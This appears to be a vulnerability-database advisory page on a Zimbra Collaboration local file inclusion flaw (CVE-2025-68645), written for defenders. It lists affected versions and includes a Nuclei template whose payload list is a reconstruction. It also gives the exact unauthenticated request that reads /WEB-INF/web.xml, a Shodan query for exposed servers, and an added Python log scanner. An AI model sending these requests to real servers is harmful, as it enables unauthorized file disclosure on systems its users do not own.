CVE-2025-68645
published 2025-12-22


Priority: P194
Severity: high, 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, due 2026-02-12
Exploited in the wild
EPSS: 31.77% (98.1th percentile)
A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.

Affected (2 ranges)

Vendor    Product                      Version range           Fixed in
synacor   zimbra_collaboration_suite   >= 10.0.0, < 10.0.18    10.0.18
synacor   zimbra_collaboration_suite   >= 10.1.0, < 10.1.13    10.1.13

Detection & IOCs (extracted from sources)

Paths:
  /h/rest
  /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
  /WEB-INF/web.xml
  /h/changepass
  /h/imessage
  /h/postLoginRedirect
  /h/printcalls
  /h/printcalendar
  /h/printvoicemails
  /h/printappointments
  /h/printcontacts
  /h/printconversations
  /h/printmessage
  /h/printtasks
  /h/viewimages
Nuclei template:

id: CVE-2025-68645
info:
  name: Zimbra Collaboration - Local File Inclusion
  author: DhiyaneshDk,sirifu4k1
  severity: high
  tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev
http:
- method: GET
  path:
  - "{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
  # {{path}} is filled from this payload list, reconstructed here from the 13 /h/*
  # paths in the IOC section above (an assumption, not the template as published).
  payloads:
    path:
    - h/rest
    - h/changepass
    - h/imessage
    - h/postLoginRedirect
    - h/printcalls
    - h/printcalendar
    - h/printvoicemails
    - h/printappointments
    - h/printcontacts
    - h/printconversations
    - h/printmessage
    - h/printtasks
    - h/viewimages
  stop-at-first-match: true
  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - "<web-app"
    - "Zimbra"
    condition: and
  - type: status
    status:
    - 200
  • The exploit uses the `javax.servlet.include.servlet_path` request parameter to trigger LFI via the RestFilter servlet. Monitor HTTP GET requests to any `/h/*` endpoint that carry this parameter name.
  • Requests targeting `/WEB-INF/web.xml` via the `javax.servlet.include.servlet_path` parameter are a strong indicator of active exploitation; the Nuclei template treats a 200 response whose body contains both `<web-app` and `Zimbra` as a positive match.
  • The Shodan fingerprint for exposed Zimbra instances targeted by this CVE is `http.title:"Zimbra Collaboration Suite"`. Use it to identify internet-exposed assets.
  • The vulnerability is unauthenticated and exploitable with a single HTTP GET; no session is required. Review web server access logs for unauthenticated requests to `/h/rest` or any other `/h/*` endpoint with `javax.servlet.include.servlet_path` in the query string.
  • CISA KEV confirms active in-the-wild exploitation. CISA classifies the vulnerability as PHP Remote File Inclusion, with a remediation due date of 2026-02-12 for federal agencies.
  • The LFI vulnerability only affects Zimbra Collaboration (ZCS) versions 10.0 and 10.1 running the Webmail Classic UI with the RestFilter servlet exposed. Fixes were added on January 3–4, 2026.
  • The Nuclei template uses `stop-at-first-match: true` across 13 `/h/*` paths, so only the first matching endpoint is confirmed per scan run; in production log analysis, monitor every listed path independently.
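The log-review guidance in the notes above, as an added example that is not part of this page, of Zimbra, or of the Nuclei template authors' work: a small Python scanner over combined-format access-log lines (constructed samples) that flags `/h/*` requests carrying the `javax.servlet.include.servlet_path` parameter, decoding percent-encoded parameter names so encoded variants are not missed.

```python
# Added example (not from this page, Zimbra, or the Nuclei template authors):
# flag access-log requests matching the CVE-2025-68645 pattern. Assumes
# Apache/nginx combined log format; the sample lines below are constructed.
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Parameter name abused via the RestFilter servlet (from the advisory above).
INCLUDE_PARAM = "javax.servlet.include.servlet_path"

# Combined log format: src ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify_request(target: str) -> Optional[str]:
    """Label one request target, or return None when it looks benign."""
    parts = urlsplit(target)
    if not unquote(parts.path).startswith("/h/"):
        return None  # the page scopes this indicator to /h/* endpoints
    # parse_qs percent-decodes names, so javax%2Eservlet... is still matched;
    # double encoding is deliberately left alone here.
    params = parse_qs(parts.query, keep_blank_values=True)
    if INCLUDE_PARAM not in params:
        return None
    # A value reaching into WEB-INF is the exact web.xml read the template confirms.
    if any("WEB-INF" in v.upper() for v in params[INCLUDE_PARAM]):
        return "exploit-attempt"
    return "suspicious-include-param"


def scan_log(lines):
    """Return (src, time, target, status, label) for every flagged line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify_request(m["target"])):
            findings.append((m["src"], m["time"], m["target"], int(m["status"]), label))
    return findings


# Constructed sample traffic (not real log data).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Dec/2025:10:00:01 +0000] "GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1" 200 4321 "-" "curl/8.0"',
    '203.0.113.5 - - [22/Dec/2025:10:00:02 +0000] "GET /h/printmessage?javax%2Eservlet%2Einclude%2Eservlet_path=%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 4321 "-" "curl/8.0"',
    '198.51.100.7 - - [22/Dec/2025:10:00:03 +0000] "GET /h/rest?javax.servlet.include.servlet_path=/public/login.jsp HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [22/Dec/2025:10:00:04 +0000] "GET /h/search?st=message HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

The third constructed line shows why the parameter name alone is worth an alert: a value outside `WEB-INF` is still an attempt to steer RestFilter dispatching, just not the web.xml read the template checks for.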

CVSS provenance

nvd (v3.1): 8.8 HIGH  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vulncheck: 8.8 HIGH
cisa: 8.8 HIGH